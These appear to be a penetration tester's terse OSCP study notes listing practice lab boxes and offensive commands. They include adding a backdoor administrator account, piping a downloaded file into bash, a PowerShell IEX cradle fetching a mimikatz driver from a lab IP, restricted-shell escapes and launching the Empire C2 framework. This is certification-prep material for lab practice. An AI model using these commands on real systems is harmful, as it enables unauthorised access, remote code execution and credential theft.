Notes
God notes
PG boxes on OSCP:
Heist, Hutch, Vault in PG Practice,Resourced
HTB:
APT, Fuse, Cascade, Monterverde,Resolute,Forest, Arkham, Active, Mantis
Cyber Seclabs:
zero, Secret,Brute, Dictionary, Roast, Spray, Sync, Toast
Always look for config files if you have access to application files!
adds an admini account to the hosts
Try legion script for nmap scanning!
always do nmap -sC (default scripts)
If you are a service account you can create an admin account.
net user gori | passwd123! /add; net localgroup administrators gori /add
evil-winrm -i IP -u gori -p 'passwd123!' to login as the account you just created
net user gori to check priv
---
/etc/apache2 ;look for config files
linux enum
ldd --version
Transfer module
curl IP/file_name | bash (to execute it)
cat /etc/lsb-release
Transfer method
python -m SimpleHTTPserver 80
-> curl -o outputfile IP/filename
Restricted shell? Try this:
ssh [email protected] -t "bash --noprofile"
[email protected]:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
bash: groups: command not found
[email protected]:~$ export PATH=$PATH:/bin/
[email protected]:~$ export PATH=$PATH:/usr/bin
---
Run sudo
IEX(New-Object Net.WebClient).downloadString('http://192.168.119.146:8080/mimidrv.sys')

docker run -it --name empire -v empire-data:/opt/Empire/data \
-p 443:443 --entrypoint bash empireproject/empire
Last modified 1yr ago